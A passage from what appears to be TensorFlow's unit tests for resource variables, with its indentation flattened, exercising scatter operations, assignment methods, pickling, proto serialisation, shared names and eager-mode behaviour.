def testScatterMul(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant([[5]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
def testEagerPickle(self):
with context.eager_mode():
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, "var.pickle")
with open(fname, "wb") as f:
v = resource_variable_ops.ResourceVariable(
10.0,
dtype=dtypes.float16,
name="v")
pickle.dump(v, f)
with open(fname, "rb") as f:
new_v = pickle.load(f)
self.assertEqual(new_v.name, v.name)
self.assertEqual(new_v.shape, v.shape)
self.assertEqual(new_v.dtype, v.dtype)
self.assertEqual(new_v.trainable, v.trainable)
self.assertAllEqual(new_v.numpy(), v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterDiv(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
def testUseResource(self):
v = variables.VariableV1(1.0, use_resource=True)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
def testEagerNoUseResource(self):
with context.eager_mode():
v = variables.Variable(1.0)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
@test_util.run_in_graph_and_eager_modes
def testScatterMin(self):
with ops.device("cpu:0"):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[[6]],
dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(handle, [0],
constant_op.constant(
[[3]],
dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
def testMetagraph(self):
with ops.Graph().as_default():
with variable_scope.variable_scope("foo", use_resource=True):
a = variable_scope.get_variable("a", initializer=10.0)
momentum.MomentumOptimizer(
learning_rate=0.001, momentum=0.1).minimize(
a,
colocate_gradients_with_ops=True,
global_step=training_util.get_or_create_global_step())
graph = ops.get_default_graph()
meta_graph_def = saver.export_meta_graph(graph=graph)
with ops.Graph().as_default():
saver.import_meta_graph(meta_graph_def, import_scope="")
meta_graph_two = saver.export_meta_graph(graph=graph)
self.assertEqual(meta_graph_def, meta_graph_two)
@test_util.run_in_graph_and_eager_modes
def testScatterMax(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@test_util.run_in_graph_and_eager_modes
def testScatterAddScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterSubScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMulScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant(5, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
@test_util.run_in_graph_and_eager_modes
def testScatterDivScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
@test_util.run_in_graph_and_eager_modes
def testScatterMinScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterMaxScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@test_util.run_in_graph_and_eager_modes
def testScatterAddVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 1.5], name="add")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_add(ops.IndexedSlices(indices=[1], values=[2.5])))
self.assertAllEqual([0.0, 4.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterSubVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 2.5], name="sub")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_sub(ops.IndexedSlices(indices=[1], values=[1.5])))
self.assertAllEqual([0.0, 1.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterMaxVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 4.0], name="max1")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(ops.IndexedSlices(indices=[1], values=[5.0])))
self.assertAllEqual([0.0, 5.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5], name="max2")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(ops.IndexedSlices(indices=[1], values=[2.0])))
self.assertAllEqual([0.0, 3.5], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterMinVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 4.0], name="min1")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(ops.IndexedSlices(indices=[1], values=[5.0])))
self.assertAllEqual([0.0, 4.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5], name="min2")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(ops.IndexedSlices(indices=[1], values=[2.0])))
self.assertAllEqual([0.0, 2.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterMulVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 4.0], name="mul")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_mul(ops.IndexedSlices(indices=[1], values=[3.0])))
self.assertAllEqual([0.0, 12.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterDivVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 6.0], name="div")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_div(ops.IndexedSlices(indices=[1], values=[2.0])))
self.assertAllEqual([0.0, 3.0], self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateVariableMethod(self):
v = resource_variable_ops.ResourceVariable([0.0, 6.0], name="update")
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_update(ops.IndexedSlices(indices=[1], values=[3.0])))
self.assertAllEqual([0.0, 3.0], self.evaluate(v))
@test_util.run_deprecated_v1
def testScatterUpdateString(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.string, shape=[1, 1])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant([["a"]], dtype=dtypes.string)))
self.evaluate(resource_variable_ops.resource_scatter_update(
handle, [0], constant_op.constant([["b"]], dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(compat.as_bytes(self.evaluate(read)[0][0]),
compat.as_bytes("b"))
@test_util.run_deprecated_v1
def testScatterUpdateStringScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.string, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[["a"]],
dtype=dtypes.string)))
self.evaluate(
resource_variable_ops.resource_scatter_update(handle, [0],
constant_op.constant(
"b",
dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(
compat.as_bytes(self.evaluate(read)[0][0]), compat.as_bytes("b"))
# TODO(alive): get this to work in Eager mode.
def testGPU(self):
with test_util.use_gpu():
abc = variable_scope.get_variable(
"abc",
shape=[1],
initializer=init_ops.ones_initializer(),
use_resource=True)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(
self.evaluate(
resource_variable_ops.var_is_initialized_op(abc.handle)),
True)
def testScatterBool(self):
with context.eager_mode():
ref = resource_variable_ops.ResourceVariable(
[False, True, False], trainable=False)
indices = math_ops.range(3)
updates = constant_op.constant([True, True, True])
state_ops.scatter_update(ref, indices, updates)
self.assertAllEqual(ref.read_value(), [True, True, True])
@test_util.run_in_graph_and_eager_modes
def testConstraintArg(self):
constraint = lambda x: x
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var0")
self.assertEqual(v.constraint, constraint)
constraint = 0
with self.assertRaises(ValueError):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, constraint=constraint, name="var1")
# TODO(alive): how should this work in Eager mode?
@test_util.run_deprecated_v1
def testInitFn(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32)
self.assertEqual(v.handle.op.colocation_groups(),
v.initializer.inputs[1].op.colocation_groups())
def testCountUpTo(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(v.count_up_to(1), 0)
with self.assertRaises(errors.OutOfRangeError):
v.count_up_to(1)
def testCountUpToFunction(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(0, name="upto")
self.assertAllEqual(state_ops.count_up_to(v, 1), 0)
with self.assertRaises(errors.OutOfRangeError):
state_ops.count_up_to(v, 1)
@test_util.run_in_graph_and_eager_modes
def testInitFnDtype(self):
v = resource_variable_ops.ResourceVariable(
initial_value=lambda: 1, dtype=dtypes.float32, name="var0")
self.assertEqual(dtypes.float32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitFnNoDtype(self):
v = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="var2")
self.assertEqual(dtypes.int32, v.value().dtype)
@test_util.run_in_graph_and_eager_modes
def testInitializeAllVariables(self):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.float32,
name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(1.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testOperatorOverload(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(2.0, self.evaluate(v + v))
@test_util.run_in_graph_and_eager_modes
def testAssignMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign(2.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign(3.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign(4.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testLoad(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
v.load(2.0)
self.assertEqual(2.0, self.evaluate(v.value()))
def testShapePassedToGradient(self):
with ops.Graph().as_default():
@custom_gradient.custom_gradient
def differentiable_scatter_update(handle, indices, values):
with ops.control_dependencies([
resource_variable_ops.resource_scatter_update(
handle, indices, values)]):
new_handle = array_ops.identity(handle)
def grad(dresult):
self.assertIsNotNone(
tensor_util.constant_value(dresult.dense_shape))
return [dresult, None, None]
return new_handle, grad
var = variable_scope.get_variable(
"foo", shape=[20], initializer=init_ops.zeros_initializer,
dtype=dtypes.float64, use_resource=True)
indices = math_ops.range(10)
updates = math_ops.range(9, -1, -1, dtype=dtypes.float64)
new_handle = differentiable_scatter_update(var.handle, indices, updates)
gathered = resource_variable_ops.resource_gather(
new_handle, indices, dtype=var.dtype)
gradients_impl.gradients([gathered], [updates])
def testToFromProtoCachedValue(self):
with ops.Graph().as_default():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
v_prime = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertIsNone(getattr(v_prime, "_cached_value", None))
other_v_def = resource_variable_ops.ResourceVariable(
caching_device="cpu:0",
initial_value=constant_op.constant(3.0)).to_proto()
other_v_prime = resource_variable_ops.ResourceVariable(
variable_def=other_v_def)
self.assertIsNotNone(other_v_prime._cached_value)
def testVariableDefInitializedInstances(self):
with ops.Graph().as_default(), self.cached_session():
v_def = resource_variable_ops.ResourceVariable(
initial_value=constant_op.constant(3.0)).to_proto()
with ops.Graph().as_default(), self.cached_session():
# v describes a VariableDef-based variable without an initial value.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
self.assertEqual(3.0, self.evaluate(v.initialized_value()))
# initialized_value should not rerun the initializer_op if the variable
# has already been initialized elsewhere.
self.evaluate(v.assign(1.0))
self.assertEqual(1.0, v.initialized_value().eval())
v_def.ClearField("initial_value_name")
with ops.Graph().as_default(), self.cached_session():
# Restoring a legacy VariableDef proto that does not have
# initial_value_name set should still work.
v = resource_variable_ops.ResourceVariable(variable_def=v_def)
# We should also be able to re-export the variable to a new meta graph.
self.assertProtoEquals(v_def, v.to_proto())
# But attempts to use initialized_value will result in errors.
with self.assertRaises(ValueError):
self.evaluate(v.initialized_value())
def testTrainableInProto(self):
with ops.Graph().as_default():
non_trainable_variable = resource_variable_ops.ResourceVariable(
trainable=False,
initial_value=constant_op.constant(10.0))
self.assertEqual(
False,
resource_variable_ops.ResourceVariable(
variable_def=non_trainable_variable.to_proto())
.trainable)
trainable_variable = resource_variable_ops.ResourceVariable(
trainable=True,
initial_value=constant_op.constant(10.0))
self.assertEqual(
True,
resource_variable_ops.ResourceVariable(
variable_def=trainable_variable.to_proto())
.trainable)
@test_util.run_in_graph_and_eager_modes
def testSparseRead(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value = self.evaluate(v.sparse_read([0, 3, 1, 2]))
self.assertAllEqual(init_value[[0, 3, 1, 2], ...], value)
@test_util.run_in_graph_and_eager_modes
def testGatherNd(self):
init_value = np.reshape(np.arange(np.power(4, 3)), (4, 4, 4))
v = resource_variable_ops.ResourceVariable(
constant_op.constant(init_value, dtype=dtypes.int32), name="var3")
self.evaluate(variables.global_variables_initializer())
value_op = v.gather_nd([[0, 0], [1, 2], [3, 3]])
self.assertAllEqual([3, 4], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([[0, 1, 2, 3], [24, 25, 26, 27], [60, 61, 62, 63]],
value)
value_op = v.gather_nd([[0, 0, 0], [1, 2, 3], [3, 3, 3]])
self.assertAllEqual([3], value_op.shape)
value = self.evaluate(value_op)
self.assertAllEqual([0, 27, 63], value)
@test_util.run_deprecated_v1
def testToFromProto(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertEqual(2, math_ops.add(w, 1).eval())
self.assertEqual(v._handle, w._handle)
self.assertEqual(v._graph_element, w._graph_element)
@test_util.run_in_graph_and_eager_modes
def testAssignAddMethod(self):
v = resource_variable_ops.ResourceVariable(1.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_add(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_add(1.0, read_value=True)
self.assertEqual(3.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_add(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(4.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
def testAssignSubMethod(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.evaluate(v.assign_sub(1.0))
self.assertEqual(2.0, self.evaluate(v.value()))
# Tests for the 'read_value' argument:
assign_with_read = v.assign_sub(1.0, read_value=True)
self.assertEqual(1.0, self.evaluate(assign_with_read))
assign_without_read = v.assign_sub(1.0, read_value=False)
if context.executing_eagerly():
self.assertIsNone(assign_without_read)
else:
self.assertIsInstance(assign_without_read, ops.Operation)
self.evaluate(assign_without_read)
self.assertEqual(0.0, self.evaluate(v.value()))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testDestroyResource(self):
v = resource_variable_ops.ResourceVariable(3.0, name="var0")
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3.0, self.evaluate(v.value()))
self.evaluate(resource_variable_ops.destroy_resource_op(v.handle))
with self.assertRaises(errors.FailedPreconditionError):
self.evaluate(v.value())
# Handle to a resource not actually created.
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
# Should raise no exception
self.evaluate(resource_variable_ops.destroy_resource_op(
handle, ignore_lookup_error=True))
@test_util.run_deprecated_v1
def testAssignDifferentShapes(self):
with self.cached_session() as sess, variable_scope.variable_scope(
"foo", use_resource=True):
var = variable_scope.get_variable("x", shape=[1, 1], dtype=dtypes.float32)
placeholder = array_ops.placeholder(dtypes.float32)
assign = var.assign(placeholder)
sess.run(
[assign],
feed_dict={placeholder: np.zeros(shape=[2, 2], dtype=np.float32)})
def testAssignDifferentShapesEagerNotAllowed(self):
with context.eager_mode():
with variable_scope.variable_scope("foo"):
var = variable_scope.get_variable("x", shape=[1, 1],
dtype=dtypes.float32)
with self.assertRaisesRegexp(ValueError,
"Shapes.*and.*are incompatible"):
assign = var.assign(np.zeros(shape=[2, 2]))
self.evaluate(assign)
@test_util.disable_xla("XLA doesn't allow changing shape at assignment, as "
"dictated by tf2xla/xla_resource.cc:SetTypeAndShape")
@test_util.run_in_graph_and_eager_modes
def testAssignDifferentShapesAllowed(self):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[1, 1]),
shape=tensor_shape.TensorShape(None))
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(np.zeros(shape=[1, 1]), var.read_value())
self.evaluate(var.assign(np.zeros(shape=[2, 2])))
self.assertAllEqual(np.zeros(shape=[2, 2]), var.read_value())
@test_util.run_in_graph_and_eager_modes
def testAssignReturnsVariable(self):
var = resource_variable_ops.ResourceVariable(1.)
self.evaluate(variables.global_variables_initializer())
assigned = var.assign(2.)
self.assertIsInstance(assigned, resource_variable_ops.BaseResourceVariable)
assigned = assigned.assign(3.)
self.assertEqual(self.evaluate(assigned), 3.)
self.assertEqual(self.evaluate(var), 3.)
self.assertEqual(self.evaluate(var.assign_add(1.).assign_add(1.)), 5)
self.assertEqual(self.evaluate(var.assign_sub(1.).assign_sub(1.)), 3)
var = resource_variable_ops.ResourceVariable([1., 2.])
self.evaluate(variables.global_variables_initializer())
slices = ops.IndexedSlices(indices=[1], values=[2])
def assert_eq(tensor, vals):
self.assertAllEqual(self.evaluate(tensor), vals)
assert_eq(var.scatter_add(slices).scatter_add(slices), [1., 6.])
assert_eq(var.scatter_sub(slices).scatter_sub(slices), [1., 2.])
slices2 = ops.IndexedSlices(indices=[0], values=[3])
assert_eq(var.scatter_max(slices2).scatter_add(slices), [3., 4.])
assert_eq(var.scatter_add(slices).scatter_min(slices), [3., 2.])
assert_eq(var.scatter_mul(slices).scatter_mul(slices), [3., 8.])
assert_eq(var.scatter_div(slices).scatter_div(slices), [3., 2.])
assert_eq(
var.scatter_nd_update([[1]], [4.]).scatter_nd_add([[0]], [2.])
.scatter_nd_sub([[1]], [3]),
[5., 1.])
assert_eq(var, [5., 1.])
batch_var = resource_variable_ops.ResourceVariable(array_ops.ones((2, 2)))
self.evaluate(variables.global_variables_initializer())
batch_slices1 = ops.IndexedSlices(indices=[[1], [0]], values=[[2], [2]])
batch_slices2 = ops.IndexedSlices(indices=[[1], [1]], values=[[3], [3]])
assert_eq(
batch_var.batch_scatter_update(batch_slices1)
.batch_scatter_update(batch_slices2),
[[1, 3], [2, 3]])
@test_util.run_in_graph_and_eager_modes
def testInitValueWrongShape(self):
with self.assertRaisesWithPredicateMatch(
ValueError, r"not compatible with"):
var = resource_variable_ops.ResourceVariable(
initial_value=np.zeros(shape=[3]),
shape=[4])
self.evaluate(variables.global_variables_initializer())
self.evaluate(var.read_value())
@test_util.run_deprecated_v1
def testDtypeAfterFromProto(self):
v = resource_variable_ops.ResourceVariable(2.0)
w = resource_variable_ops.ResourceVariable.from_proto(v.to_proto())
self.assertIsInstance(w.dtype, dtypes.DType)
self.assertEqual(v.dtype, w.dtype)
# TODO(alive): get caching to work in eager mode.
@test_util.run_deprecated_v1
def testCachingDevice(self):
with ops.device("/job:server/task:1"):
v = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", v.value().device)
with self.assertRaises(ValueError):
_ = v.value().op.get_attr("_class")
with ops.colocate_with(v.op):
w = resource_variable_ops.ResourceVariable(
2.0, caching_device="/job:localhost")
self.assertEqual("/job:localhost", w.value().device)
with self.assertRaises(ValueError):
_ = w.value().op.get_attr("_class")
@test_util.run_deprecated_v1
def testSharedName(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(300.0, name="var4")
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.var_handle_op(
dtype=v.dtype.base_dtype, shape=v.get_shape(), shared_name="var4",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
x = resource_variable_ops.var_handle_op(
dtype=v.dtype.base_dtype, shape=v.get_shape(), shared_name="var5",
container=ops.get_default_graph()._container)
with self.assertRaisesOpError(
"(Resource .*/var5/.* does not exist|Read of uninitialized variable)"
):
resource_variable_ops.read_variable_op(x, v.dtype.base_dtype).eval()
@test_util.run_deprecated_v1
def testSharedNameWithNamescope(self):
with self.cached_session():
with ops.name_scope("foo"):
v = resource_variable_ops.ResourceVariable(300.0, name="var6")
self.assertEqual("foo/var6", v._shared_name) # pylint: disable=protected-access
self.assertEqual("foo/var6:0", v.name)
self.evaluate(variables.global_variables_initializer())
w = resource_variable_ops.var_handle_op(
dtype=v.dtype.base_dtype, shape=v.get_shape(), shared_name="foo/var6",
# Needed in Eager since we get a unique container name by default.
container=ops.get_default_graph()._container)
w_read = resource_variable_ops.read_variable_op(w, v.dtype.base_dtype)
self.assertEqual(300.0, self.evaluate(w_read))
@test_util.run_in_graph_and_eager_modes
def testShape(self):
v = resource_variable_ops.ResourceVariable(
name="var4", initial_value=array_ops.ones(shape=[10, 20, 35]))
self.assertEqual("(10, 20, 35)", str(v.shape))
self.assertEqual("(10, 20, 35)", str(v.get_shape()))
self.assertEqual("(10, 20, 35)", str(v.value().shape))
self.assertEqual("(3, 20, 35)", str(v.sparse_read([0, 1, 2]).shape))
if not context.executing_eagerly():
self.assertEqual(
"<unknown>",
str(v.sparse_read(array_ops.placeholder(dtypes.int32)).shape))
@test_util.run_deprecated_v1
def testSetInitialValue(self):
with self.cached_session():
# Initialize variable with a value different from the initial value passed
# in the constructor.
v = resource_variable_ops.ResourceVariable(2.0)
v.initializer.run(feed_dict={v.initial_value: 3.0})
self.assertEqual(3.0, v.value().eval())
@test_util.run_v1_only("b/120545219")
def testControlFlowInitialization(self):
"""Expects an error if an initializer is in a control-flow scope."""
def cond(i, _):
return i < 10
def body(i, _):
zero = array_ops.zeros([], dtype=dtypes.int32)
v = resource_variable_ops.ResourceVariable(initial_value=zero)
return (i + 1, v.read_value())
with self.assertRaisesRegexp(ValueError, "initializer"):
control_flow_ops.while_loop(cond, body, [0, 0])
def testVariableEager(self):
with context.eager_mode():
init = array_ops.ones(shape=[10, 20, 35], dtype=dtypes.int32)
constraint = lambda x: x
with ops.name_scope("foo", skip_on_eager=False):
v = resource_variable_ops.ResourceVariable(
name="var7",
initial_value=init,
caching_device="cpu:0",
constraint=constraint)
# Test properties
self.assertEqual(dtypes.int32, v.dtype)
self.assertEqual("foo/var7:0", v.name)
self.assertAllEqual([10, 20, 35], v.shape.as_list())
self.assertIsInstance(v.handle, ops.EagerTensor)
self.assertEqual(constraint, v.constraint)
self.assertAllEqual(init.numpy(), v.read_value().numpy())
self.assertAllEqual(init.numpy(), v.value().numpy())
# Callable init.
callable_init = lambda: init * 2
v2 = resource_variable_ops.ResourceVariable(
initial_value=callable_init, name="var7")
self.assertEqual("var7:0", v2.name)
self.assertAllEqual(2 * init.numpy(), v2.read_value().numpy())
# Test assign_add.
new_v2_val = v2.assign_add(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 3, new_v2_val.numpy())
# Test assign_sub.
new_v2_val = v2.assign_sub(v.read_value())
self.assertAllEqual(v.read_value().numpy() * 2, new_v2_val.numpy())
# Test assign.
v2.assign(v.read_value())
self.assertAllEqual(v.read_value().numpy(), v2.read_value().numpy())
# Test load
v2.load(2 * v.read_value())
self.assertAllEqual(2 * v.read_value().numpy(), v2.read_value().numpy())
# Test convert_to_tensor
t = ops.convert_to_tensor(v)
self.assertAllEqual(t.numpy(), v.read_value().numpy())
# Test operations
self.assertAllEqual((v * 2).numpy(), (v + v).numpy())
def testContainerEager(self):
with context.eager_mode():
v1 = resource_variable_ops.ResourceVariable(initial_value=lambda: 1,
name="same")
with ops.container("different"):
v2 = resource_variable_ops.ResourceVariable(initial_value=lambda: 0,
name="same")
v2.assign(2)
self.assertEqual(1, v1.read_value().numpy())
self.assertEqual(2, v2.read_value().numpy())
def testDestruction(self):
with context.eager_mode():
var = resource_variable_ops.ResourceVariable(initial_value=1.0,
name="var8")
var_handle = var._handle
del var
with self.assertRaisesRegexp(errors.NotFoundError,
r"Resource .* does not exist."):
resource_variable_ops.destroy_resource_op(var_handle,
ignore_lookup_error=False)
def testScatterUpdate(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="update")
state_ops.scatter_update(v, [1], [3.0])
self.assertAllEqual([1.0, 3.0], v.numpy())
def testScatterAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="add")
state_ops.scatter_add(v, [1], [3])
self.assertAllEqual([1.0, 5.0], v.numpy())
def testScatterSubStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([1.0, 2.0], name="sub")
state_ops.scatter_sub(v, [1], [3])
self.assertAllEqual([1.0, -1.0], v.numpy())
def testScatterUpdateVariant(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable([
list_ops.empty_tensor_list(
element_dtype=dtypes.float32, element_shape=[])
])
v.scatter_update(
ops.IndexedSlices(
list_ops.tensor_list_from_tensor([1., 2.], element_shape=[]), 0))
self.assertAllEqual(
list_ops.tensor_list_get_item(v[0], 0, element_dtype=dtypes.float32),
1.)
def testGroupDoesntForceRead(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
assign = v.assign_add(1.0)
g = control_flow_ops.group([assign])
self.assertEqual(g.control_inputs[0].type, "AssignAddVariableOp")
def testScatterNdAddStateOps(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(
[1, 2, 3, 4, 5, 6, 7, 8], dtype=dtypes.float32, name="add")
indices = constant_op.constant([[4], [3], [1], [7]], dtype=dtypes.int32)
updates = constant_op.constant([9, 10, 11, 12], dtype=dtypes.float32)
